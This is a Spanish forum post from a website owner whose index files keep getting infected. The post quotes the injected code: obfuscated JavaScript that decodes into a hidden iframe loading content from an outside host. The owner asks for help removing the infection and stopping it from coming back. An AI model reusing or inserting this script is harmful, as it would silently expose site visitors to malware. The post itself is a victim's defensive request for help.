Resulta que tengo un sitio web que está sufriendo ataques. Al parecer, por lo que he entendido, es un troyano, pero no sé donde narices está.
Este virus escribe en todos los index el siguiente código:
Código :
<!-- o65 -->
<script type="text/javascript">function Decode() {
var temp="",i,c=0,out="";
var str="60!105!102!114!97!109!101!32!115!114!99!61!39!104!116!116!112!58!47!47!119!119!119!46!113!109!101!109!115!46!99!111!109!46!109!121!47!116!101!99!104!110!111!108!111!103!121!47!104!116!109!108!47!39!32!119!105!100!116!104!61!39!49!39!32!104!101!105!103!104!116!61!39!49!39!32!115!116!121!108!101!61!39!118!105!115!105!98!105!108!105!116!121!58!32!104!105!100!100!101!110!59!39!62!60!47!105!102!114!97!109!101!62!";l=str.length;
while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
c++;
out=out+String.fromCharCode(temp);temp="";}
document.write(out);}Decode();
</script><!-- c65 -->Y aparentemente no ocurre nada, excepto en la página principal (php), que provoca un problema de parseo xml (con lo cual no se muestra)
En las páginas simples html no ocurre nada.
Y según unas intrucciones que he traducido del ruso dicen que haga lo siguiente:
Comprobar en sitio web (es linux)
No usar total comander
Canmbiar las contraseñas
No sé si me tengo que ñponer en contacto con los admin del server, o que rayos hacer para evitar este problema. Ya he eliminado el código de todos los index pero en poco tiempo vuelve a aparecer.
Socorro!
